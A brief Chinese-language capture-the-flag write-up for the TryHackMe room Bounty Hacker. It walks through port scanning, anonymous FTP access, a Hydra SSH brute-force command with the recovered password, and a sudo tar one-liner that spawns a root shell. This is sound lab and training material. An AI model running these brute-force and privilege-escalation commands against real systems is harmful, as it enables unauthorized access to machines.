[Day11] THM Bounty Hacker

今天来打 Try Hack Me 上面的，Bounty Hacker 题目，主要使用了爆破 ssh 密码，以及 tar 的提权利用方式。

• 网址：https://tryhackme.com/room/cowboyhacker
• IP : 10.10.164.54

扫 Port

• rustscan -a 10.10.164.54 -r 1-65535
  • 
  • 有开的 Port 是 21 , 22 , 80
• nmap -A -p21,22,80 10.10.164.54
  • 
  • FTP 可以匿名登入 !!

FTP Anonymous login

• FTP 登入
  • 
  • 里面有两ㄍ档案都载下来
• FTP 档案观察
  • 
    • 作者是 lin
  • 
    • 看起来是一个密码表

爆破密码

• 试着机於密码表与 lin 的帐号，对密码使用 Hydra 进行暴力破解。
  • hydra -l 'lin' -P locks.txt ssh://10.10.164.54
  • 
  • 可以看到顺利爆出了
    • 帐号 : lin
    • 密码 : RedDr4gonSynd1cat3
• SSH 登入成功
  • 
• 取得 user flag
  • 

提权

• 起手式 sudo -l
  • 
  • 发现可以用 sudo tar
• GTFOBins 寻找 tar sudo 提权
  • https://gtfobins.github.io/gtfobins/tar/#sudo
  • 输入以下指令即可提权
    • sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
• 提权完毕，取得 root flag
  •